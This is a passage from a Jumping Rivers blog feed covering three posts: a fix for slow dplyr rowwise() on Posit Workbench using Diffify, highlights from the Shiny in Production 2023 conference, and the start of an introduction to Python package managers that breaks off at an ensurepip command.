&lt;p&gt;The components of the platform were:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Gitlab&lt;/em&gt;: where data scientists can develop and share their code using all the benefits of Git version control.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Posit Workbench&lt;/em&gt;: which hosts development environments such as RStudio on beefy servers, with far more computational power compared to IDEs on local machines.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Posit Connect&lt;/em&gt;: which allows data scientists to easily share data, dashboards and reports. It allows the sharing of documents, reports, interactive web applications, as well as hosting Application Programmatic Interfaces (APIs).&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Posit Package Manger&lt;/em&gt;: which allows for the organisation, centralisation and distribution of code packages. It provides a mirror of R and Python packages, downloaded from external sources such as CRAN (the Comprehensive R Archive Network). It also provides a way for internally-developed R and Python packages to be shared, if the client wishes.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-dplyr-debugging-posit-diffify"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="our-deployment-philosophy"&gt;Our deployment philosophy&lt;/h3&gt;
&lt;p&gt;When we deploy these components together, we do so in such a way that they enhance each other&amp;rsquo;s functionality; the sum is greater than its parts. For instance, we:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Allow users to use the same authentication across all of these applications.&lt;/li&gt;
&lt;li&gt;Ensure that users are able to publish documents from Workbench to Connect out-of-the-box. Users don&amp;rsquo;t have to worry about specifying the correct URLs or ports for all of this to work.&lt;/li&gt;
&lt;li&gt;Ensure that users in Workbench can access any package they need (developed internally, or from popular external package repositories such as CRAN) via Package Manager, without any extra configurations required.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Having all of these setup out-of-the-box means users can get straight to enjoying exploring and utilising the many ways in which Posit can increase productivity, without spending time on set-up.&lt;/p&gt;
&lt;p&gt;We also carry out disaster recovery, ensuring that in the event of the unexpected (server failure or data corruption, for example), we can recover all data from a backup.&lt;/p&gt;
&lt;p&gt;Finally, we carry out security hardening. Each component in our system is checked to ensure it operates to appropriate security standards. This means our infrastructure is secured to UK Government (National Cyber Security Centre) standards, and certified by CREST-accredited cloud security professionals.&lt;/p&gt;
&lt;h3 id="workbench-system-performance"&gt;Workbench system performance&lt;/h3&gt;
&lt;p&gt;One of the key selling points of doing computations on a cloud-hosted server &amp;ndash; as opposed to a data scientist&amp;rsquo;s laptop &amp;ndash; is that it&amp;rsquo;s possible to access very powerful machines in the cloud. This improves the speed at which data scientists&amp;rsquo; code gets executed, meaning quicker iterations on analysis. Where commands take longer than a few seconds, it can &lt;a href="https://www.nngroup.com/articles/response-times-3-important-limits/" rel="external"&gt;distract from&lt;/a&gt; analysts’ train of thought.&lt;/p&gt;
&lt;p&gt;If users perceive that the system provided to them is less-than-performant, &lt;a href="https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/" rel="external"&gt;they may not use it&lt;/a&gt;. It is important that we demonstrate to our users that the platform we provide has excellent performance.&lt;/p&gt;
&lt;h3 id="fast-feedback"&gt;Fast Feedback&lt;/h3&gt;
&lt;p&gt;Now, back to the client project. We had nearly finished the project, and had given the client a testing environment. Out of the blue, we received this message:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hi all, is there any reason why rowwise() is performing particularly slow in Workbench?&lt;/p&gt;
&lt;p&gt;Time on Workbench: 5.3 minutes&lt;/p&gt;
&lt;p&gt;Time to execute example code on client&amp;rsquo;s laptop: 8 seconds&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="oh-no"&gt;Oh no!&lt;/h3&gt;
&lt;p&gt;We were shocked. We pride ourselves on providing applications that are useful to our data scientist users. It seemed that &amp;ndash; even though the CPUs in our cloud instance are far more powerful than those in a typical laptop &amp;ndash; our system was the less performant. Clearly there must be some configuration wrong &amp;ndash; something we can change to put things right!&lt;/p&gt;
&lt;h3 id="what-we-tried-first"&gt;What we tried first&lt;/h3&gt;
&lt;p&gt;We tried everything we could think of to trace the root cause of the problem. We tried evaluating the code on our laptops. We tried other Workbench servers.&lt;/p&gt;
&lt;p&gt;&amp;hellip; Both showed that running on Workbench on powerful machines was much slower than on laptops. We tested across many Workbench servers and against laptops! It perplexed us!&lt;/p&gt;
&lt;h3 id="ok-what-next"&gt;Ok, what next?&lt;/h3&gt;
&lt;p&gt;There were a few more places that we could look:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The specifications of the CPUs involved on our servers, compared to our laptops, to see if it would explain the slowdown. It did not.&lt;/li&gt;
&lt;li&gt;Trying in R sessions outside of Workbench, to see if somehow it was a slowdown related to the RStudio Workbench application. It was not.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="r-packages"&gt;R packages&lt;/h3&gt;
&lt;p&gt;One thing left to try: was the version of the R package in question, &lt;a href="https://dplyr.tidyverse.org/" rel="external"&gt;&lt;code&gt;{dplyr}&lt;/code&gt;&lt;/a&gt;, the same on all machines?&lt;/p&gt;
&lt;p&gt;The Workbench servers we provided had newer versions of that package past v1.1.0, while on all of our laptops, we had older versions cached. This may have been because we had just set up the server and users were just getting started with using it and installing the packages they needed, so they would tend to have the later versions of packages installed. On their laptops, they may have installed &lt;code&gt;{dplyr}&lt;/code&gt; or &lt;code&gt;{tidyverse}&lt;/code&gt; some time ago.&lt;/p&gt;
&lt;p&gt;By downgrading the version of &lt;code&gt;{dplyr}&lt;/code&gt;, it turned out we were able to execute the given reproducible example in 3 seconds &amp;ndash; faster than the client&amp;rsquo;s existing solution!&lt;/p&gt;
&lt;h3 id="obvious-solution-downgrade-check-diffify-first"&gt;Obvious solution: downgrade? Check Diffify first&lt;/h3&gt;
&lt;p&gt;You may think that the obvious solution would be to encourage the client to downgrade the version of &lt;code&gt;{dplyr}&lt;/code&gt; that they use in production to one before v1.1.0, which would be much faster in using &lt;code&gt;dplyr::rowwise()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;However, we had one last thing to check: what features would be lost if we did this? Potentially there could be improvements in the later versions, which we could lose by downgrading? Would this break existing code?&lt;/p&gt;
&lt;p&gt;Enter &lt;a href="https://diffify.com/R/dplyr/1.0.10/1.1.0" rel="external"&gt;Diffify&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Diffify provides a comparison between different versions of R packages stored on &lt;a href="https://cran.r-project.org/" rel="external"&gt;CRAN&lt;/a&gt; or Python packages stored on &lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt;. It allows users to select the versions of packages that they want to compare, and presents the differences in a human readable way, making it easy to pick out anything relevant quickly.&lt;/p&gt;
&lt;p&gt;It does this by looking at things such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;NEWS files included with packages,&lt;/li&gt;
&lt;li&gt;Changes in functions included as part of the package&lt;/li&gt;
&lt;li&gt;Arguments which functions take.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Diffify was useful in this case! Had we downgraded &lt;code&gt;{dplyr}&lt;/code&gt;, we would have removed recent performance improvements in other dplyr functions. A patricular example to note is with the &lt;code&gt;case_when()&lt;/code&gt; function. In version 1.1.0, this function would be significantly slower, an important fact to note given that the client was moving across to using &lt;code&gt;case_when()&lt;/code&gt; as an alternative to using rowwise(), which is being deprecated. Downgrading to version 1.1.0 would have had the result of not allowing us to access these improvements.&lt;/p&gt;
&lt;p&gt;The release notes said:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Fixed a major performance regression in case_when(). It is still a little slower than in dplyr 1.0.10, but we plan to improve this further in the future (#6674).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, perhaps both the client’s current approach of using &lt;code&gt;rowwise()&lt;/code&gt; and future approach of using &lt;code&gt;case_when()&lt;/code&gt; would both perform well on v1.0.10. But this has to be tested.&lt;/p&gt;
&lt;img src="diffify-screenshot.png" alt="Screenshot of Diffify showing the News updates comparing dplyr version 1.1.1 with 1.0.10." style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h3 id="final-recommendation-we-made-to-client"&gt;Final recommendation we made to client&lt;/h3&gt;
&lt;p&gt;For this particular function, &lt;code&gt;rowwise()&lt;/code&gt;, it turns out the key determinant of performance is the version of the &lt;code&gt;{dplyr}&lt;/code&gt; package being used. Although downgrading the version would solve this particular problem, it’s important to make sure that doing so doesn’t affect other functions under active development, such as &lt;code&gt;case_when()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In fact, the functions used in the client’s previous approach were moving to a suspended development stage. In this case, downgrading would have solved a problem that would soon no longer exist, and introduce a new problem for the code migrated to the better supported &lt;code&gt;case_when()&lt;/code&gt; function.&lt;/p&gt;
&lt;h3 id="summary"&gt;Summary&lt;/h3&gt;
&lt;p&gt;Here we see some extra support we provided our client for a problem we hadn’t anticipated at the beginning of our project. Sometimes the issue appears to be in one place, but further investigation reveals it’s in another. We are glad we have a good relationship with our client, who mentioned the slowdown to us, allowing us to get to problem solving.&lt;/p&gt;
&lt;h3 id="how-can-we-help"&gt;How can we help?&lt;/h3&gt;
&lt;p&gt;If you are looking for a data science platform, or require support maintaining your existing set-up, &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;get in touch&lt;/a&gt;! As &lt;a href="https://www.jumpingrivers.com/posit/" rel="external"&gt;Full Service Certified Posit Partners&lt;/a&gt;, we are trusted by &lt;a href="https://posit.co/certified-partners/" rel="external"&gt;Posit&lt;/a&gt; to provide installation, support and maintenance services on their products, as well as resell Posit licenses at no extra cost, but with great deals on our services.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/dplyr-debugging-posit-diffify/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Highlights from Shiny in Production (2023)</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/</link><pubDate>Thu, 19 Oct 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Following on from the success of &lt;a href="https://www.jumpingrivers.com/blog/shiny-in-production-highlights/" rel="external"&gt;Shiny in Production 2022&lt;/a&gt;, last week we were delighted to host the conference for the second time. The event took place at the Catalyst in Newcastle and featured two days of workshops and talks spanning all things Shiny!&lt;/p&gt;
&lt;p&gt;On day one, we held three interactive workshops:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Introduction to Shiny for Python&lt;/strong&gt; - Our guest speaker, Andrie de Vries from Posit, ran a workshop introducing the Python implementation of Shiny. Andrie covered the basic building blocks of a Shiny application in Python through a nice mix of presentations and hands-on exercises.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Building Responsive Shiny Applications&lt;/strong&gt; - Our JR data scientist and trainer, Keith Newman, ran a workshop looking at how to build responsive shiny applications. Keith covered responsive design principles and best practices as well as som CSS tricks for when built in solutions don&amp;rsquo;t quite cut it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Shiny Testing&lt;/strong&gt; - Russ Hyde, another JR data scientists and trainer, ran a workshop on automated testing in production grade shiny. Russ demonstrated how to utilise {&lt;a href="https://rstudio.github.io/shinytest2/" rel="external"&gt;shinytest2&lt;/a&gt;}, {&lt;a href="https://rdrr.io/github/rstudio/shiny/man/testServer.html" rel="external"&gt;testServer&lt;/a&gt;} and {&lt;a href="https://testthat.r-lib.org/" rel="external"&gt;testthat&lt;/a&gt;} to make app development a happier and more predictable experience.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you&amp;rsquo;re keen to learn more about Shiny and other web frameworks (or something else entirely!) check out our full list of available &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;training courses&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-in-production-highlights"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;&lt;img alt="Photo of all speakers" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/everyone.jpg" width="800"&gt;&lt;/p&gt;
&lt;p&gt;Day two featured a series of talks by prominent Shiny experts from across a range industries:&lt;/p&gt;
&lt;h4 id="keynote-george-stagg-posit"&gt;Keynote: &lt;a href="https://twitter.com/gwstagg" rel="external"&gt;George Stagg&lt;/a&gt; (Posit)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Shiny Without a Server: webR and Shinylive&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Our opening keynote was given by George Stagg, a senior software enginner at Posit. George began by providing some motivation for webR and Shinylive, which allow users to run R and Shiny code in the web browser without the need for an expensive server. WebR supports graphics, presentation slides with Quarto, and interactive code in the browser. George went on to emphasise three main use-cases for Shinylive:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Building apps in the browser and sharing with colleagues&lt;/li&gt;
&lt;li&gt;Migrating an existing Shiny app to Shinylive using the {shinylive} package&lt;/li&gt;
&lt;li&gt;Embedding Shiny apps in presentation slides using the Quarto extension to Shinylive&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Before finishing, George noted that Shinylive is still experimental and should not be used for hosting apps that contain hardcoded secrets and passwords.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://georgestagg.github.io/shiny-without-a-server-2023/" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h4 id="liam-kalita-jumping-rivers"&gt;Liam Kalita (Jumping Rivers)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;The Road to Easier Shiny App Deployments&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Liam spoke about his experiences assisting clients with bringing their apps to production. He outlined some of the most common reasons that an app can fail at deployment, including missing dependencies, incorrect credentials for external databases, and insufficient system resources. He then shared some top tips to be more proactive:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Add &lt;strong&gt;continuous integration / continuous deployment (CI/CD)&lt;/strong&gt; checks that have to pass before deployment can happen&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Containerise&lt;/strong&gt; the app using tools like docker to create a portable environment that can be used across different machines&lt;/li&gt;
&lt;li&gt;Use &lt;strong&gt;monitoring and alerting&lt;/strong&gt; to track demand and performance&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Liam finished by emphasising the importance of deployment logs and avoiding hardcoded secrets.&lt;/p&gt;
&lt;h4 id="chris-brownlie-barnett-waddingham"&gt;&lt;a href="https://twitter.com/cbrownlie_r" rel="external"&gt;Chris Brownlie&lt;/a&gt; (Barnett Waddingham)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Anatomy of a Shiny app&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Chris took us on a tour of the building blocks of {shiny} to explore what really goes on under the hood of a Shiny app. We learnt about the responsibilities of some of the main components used in Shiny, such as &lt;code&gt;ShinySession&lt;/code&gt;, &lt;code&gt;ReactiveEnvironmen&lt;/code&gt;t &amp;amp; &lt;code&gt;ReactiveVal&lt;/code&gt; and how they fit together. Chris showed us how “de-magic-ifying” shiny can help us to improve our app design and avoid common pitfalls, as well as aid beginners learning shiny. The talk wrapped up with some very relatable comments Chris found whilst digging through the source code, showing that even developers of large tools such as Shiny sometimes have to resort to a “copy/paste job” “:sob:”.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://chrisbrownlie.github.io/anatomy_of_shiny_sip23" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h4 id="naomi-bradbury-clareece-nevill-and-janion-nevill-university-of-leicester"&gt;&lt;a href="https://twitter.com/NIHRCRSU" rel="external"&gt;Naomi Bradbury, Clareece Nevill and Janion Nevill&lt;/a&gt; (University of Leicester)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Health Data Scientists Developing Production Grade Shiny Apps&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Naomi, Clareece and Janion told us the story of how they unexpectedly became developers of a suite of shiny apps for healthcare researchers. They started out with a couple of simple proof of concept apps created as part of a mini project. However, as more researchers realised how useful their apps were, they started getting emails with queries, issues and even feature requests. That’s when they realised they had inadvertently become software developers and maintainers. We heard about the lessons they learnt along the journey, including how valuable it is to include software engineer expertise early on when developing apps, and that prototypes can always become production.&lt;/p&gt;
&lt;h4 id="colin-gillespie-jumping-rivers"&gt;&lt;a href="https://twitter.com/csgillespie" rel="external"&gt;Colin Gillespie&lt;/a&gt; (Jumping Rivers)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Securing Shiny Dashboards&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Colin started with covering common pitfalls in terms of security with Shiny apps like SQL injection attacks and hard coded secrets included in a repository where he comically pointed out some of things you can actually find on github. He introduced our Shiny Health Check service where we will access your app and help improve aspects like security, code structure and version control workflows. Colin finished his talk with various policies that can be implemented to improve general web security.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://docs.google.com/presentation/d/1mOnNgSe20fadNRhEU87wsF7dD_mmWndgCm3fXd1AlYA/edit?usp=sharing" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h4 id="tan-ho-zelus-analytics"&gt;&lt;a href="https://twitter.com/_TanHo" rel="external"&gt;Tan Ho&lt;/a&gt; (Zelus Analytics)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Effective Logging for Shiny&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Tan spoke about his troubles with logs being difficult to find and not necessarily useful, and his subsequent journey to find a better solution. He went into the philosophy of logging and why humans and machines will need different kinds of logs. Breaking it down to the lowest level of “What are we trying to find out from the logs?”. Tan also covered all the options for logging at package level vs logging in production Shiny apps.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://tanho.ca/logging-shiny" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h4 id="anna-skrzydło-appsilon"&gt;&lt;a href="https://www.linkedin.com/in/anna-skrzydlo/" rel="external"&gt;Anna Skrzydło&lt;/a&gt; (Appsilon)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;3 reasons why nobody uses your app&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Anna Skrzydło gave a relatable story of &amp;ldquo;Three reasons why users don&amp;rsquo;t use your app&amp;rdquo;. Spoiler alert: the main reasons are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;They don&amp;rsquo;t think they need your app&lt;/li&gt;
&lt;li&gt;They can&amp;rsquo;t use the app&lt;/li&gt;
&lt;li&gt;They don&amp;rsquo;t trust the app&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;When users don&amp;rsquo;t think they need your app, it&amp;rsquo;s possible you haven&amp;rsquo;t solved their problem. Anna suggested using user interviews, pro-typing and user personas to identify the core of the problem. If the user is struggling to use the app correctly, you can use &lt;a href="https://www.nngroup.com/articles/ten-usability-heuristics/" rel="external"&gt;usability heuristics&lt;/a&gt; to improve the user experience, rather than just offering training. Finally, if the user doesn&amp;rsquo;t trust your app, fix bugs quickly and communicate clearly when changes are coming, giving users time to prepare.&lt;/p&gt;
&lt;h4 id="keynote-cara-thompson-freelance-data-consultant"&gt;Keynote: &lt;a href="https://twitter.com/cararthompson" rel="external"&gt;Cara Thompson&lt;/a&gt; (Freelance Data Consultant)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Dynamic annotations: tips and tricks to make text shine without stealing the show&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Our closing keynote was from data visualisation expert &lt;a href="https://www.cararthompson.com/" rel="external"&gt;Cara Thompson&lt;/a&gt;. Cara gave us a whirlwind tour of detailed plot styling and taught us how to decrease reliance on text by a worked example on the Great British Bake Off data set. We had plenty of &amp;ldquo;Aha&amp;rdquo; moments watching the plot evolve from a plain {ggplot2} graphic to something that told a real story. Key takeaways were to write the text in the order you speak it, and use text hierarchy to present your story in an organised way. You can read all of Cara&amp;rsquo;s &lt;a href="https://www.cararthompson.com/talks" rel="external"&gt;top tips in her slides&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="https://www.cararthompson.com/talks/shiny-dynamic-annotations/" rel="external"&gt;Talk materials available here&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3 id="what-happens-next"&gt;What happens next?&lt;/h3&gt;
&lt;p&gt;We want to say thank you to the sponsors of the event for your support in making it possible!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rss.org.uk/" rel="external"&gt;Royal Statistical Society&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;NU Solve&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Thanks also to our speakers for their incredibly insightful presentations and workshops, and of course to all our attendees who travelled from near and far to make Shiny in Production such a memorable event! The talk recordings will be released on our &lt;a href="https://youtube.com/@jumping-rivers?si=Cwfi0bgbgFJaXnbq" rel="external"&gt;YouTube channel&lt;/a&gt; in the coming weeks, so keep your eyes peeled for that!&lt;/p&gt;
&lt;p&gt;We had such a great time running the Shiny in Production conference, that we&amp;rsquo;re planning on doing it all again next year! Shiny in Production 2024 will be taking place on 9th &amp;amp; 10th October 2024 - &lt;a href="https://www.eventbrite.co.uk/e/shiny-in-production-2024-registration-736359209217?aff=oddtdtcreator" rel="external"&gt;Super Early Bird tickets are available now&lt;/a&gt; - Look out for more details coming soon!&lt;/p&gt;
&lt;p&gt;Can&amp;rsquo;t wait that long? We&amp;rsquo;ll be hosting SatRdays London 2024 on April 27th, in collaboration with &lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt;. More details will be announced in an upcoming blog!&lt;/p&gt;
&lt;h4 id="gold-sponsor"&gt;Gold sponsor&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://www.nicd.org.uk/"&gt;&lt;img src="nicd_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NICD logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4 id="silver-sponsor-with-drinks-reception"&gt;Silver sponsor with drinks reception&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://rss.org.uk/"&gt;&lt;img src="rss_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-top: 1em" alt="RSS logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4 id="silver-sponsors"&gt;Silver Sponsors&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/"&gt;&lt;img src="nu-solve_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-bottom: 3em" alt="NU Solve logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://posit.co/"&gt;&lt;img src="posit-logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto; margin-bottom: 3em" alt="Posit logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.r-consortium.org/"&gt;&lt;img src="rconsortium-logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="R Consortium logo" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights-2023/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>An Introduction to Python Package Managers</title><link>https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/</link><pubDate>Thu, 05 Oct 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Python is a general purpose, high level language which, thanks to its simplicity and versatility, has become very popular, especially within the data science community. The extensive Python community has developed and contributed thousands of libraries and packages over the years in a plethora of different disciplines to aid developers with their applications. Managing these packages can be a challenging task without the correct tools. That&amp;rsquo;s where Python package managers come in. In this blog post we will explore what a package manager is and why they are important. We will then cover some popular examples, including how to use them, how to install them and the pros and cons of each.&lt;/p&gt;
&lt;p&gt;Whilst we will briefly touch on virtual environments in places, we will explore these in more depth in an upcoming post.&lt;/p&gt;
&lt;h3 id="what-is-a-python-package-manager"&gt;What is a Python Package Manager?&lt;/h3&gt;
&lt;p&gt;Python package managers are essential tools that help developers install, manage, and update external libraries or packages used in Python projects. These packages can contain reusable code, modules, and functions developed by other programmers, making it easier for developers to build applications without reinventing the wheel. Package managers automate the process of fetching, installing, and handling dependencies, streamlining the workflow and ensuring a smooth development experience.&lt;/p&gt;
&lt;h4 id="managing-package-dependencies"&gt;Managing Package Dependencies&lt;/h4&gt;
&lt;p&gt;One of the key challenges in software development is dealing with dependencies — the external libraries and packages that your project relies on. Python package managers help alleviate this challenge by managing dependencies automatically. When you install a package, the package manager will also fetch and install any dependencies required by that package, recursively handling all transitive dependencies whilst making sure all package versions integrate with each other.&lt;/p&gt;
&lt;p&gt;Additionally, package managers provide support for creating virtual environments. Virtual environments enable developers to create isolated and self-contained environments for each project, ensuring that the dependencies installed for one project do not interfere with another.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-python-package-managers-pip-conda-poetry"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="popular-python-package-managers"&gt;Popular Python Package Managers&lt;/h3&gt;
&lt;p&gt;There are many different Python package managers out there. Attempting to write about all of these would lead to an almost never ending blog post and no one would want to read that! Instead, we will talk about some of the most popular options that a lot of Python developers use. These are: pip, conda and poetry. Each have their advantages and disadvantages which we will talk through below.&lt;/p&gt;
&lt;h4 id="pip"&gt;pip&lt;/h4&gt;
&lt;p&gt;The most widely used Python package manager is &lt;a href="https://pypi.org/project/pip/" rel="external"&gt;pip&lt;/a&gt; (short for &amp;ldquo;pip installs packages&amp;rdquo;). It comes pre-installed with Python versions 3.4 and later. Pip allows developers to easily install packages from the &lt;a href="https://pypi.org/" rel="external"&gt;Python Package Index&lt;/a&gt; (PyPI) and other repositories. It also handles package versioning, so you can install specific versions of packages when needed.&lt;/p&gt;
&lt;h5 id="how-to-install-pip"&gt;How to Install pip&lt;/h5&gt;
&lt;p&gt;Typically, once you have installed Python pip is installed by default. If this is not the case, there are two ways to install pip:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ensurepip&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_pip.py&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="ensurepip"&gt;&lt;code&gt;ensurepip&lt;/code&gt;&lt;/h4&gt;
&lt;p&gt;Since Python 3.4 the &lt;code&gt;ensurepip&lt;/code&gt; module was added to Python as a standard library. You can filter the instructions below to your preferred OS by clicking the corresponding tab:&lt;/p&gt;
&lt;div class="tab"&gt;
&lt;button class="tablinks" onclick="openOS(event, 'ensurepipWindows')"&gt;Windows&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'ensurepipMacOS')"&gt;macOS&lt;/button&gt;
&lt;button class="tablinks" onclick="openOS(event, 'ensurepipLinux')"&gt;Linux&lt;/button&gt;
&lt;/div&gt;
&lt;div id="ensurepipWindows" class="tabcontent"&gt;
&lt;h5&gt;Windows&lt;/h5&gt;
&lt;p&gt;
In your preferred terminal run:
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;py -m ensurepip --upgrade
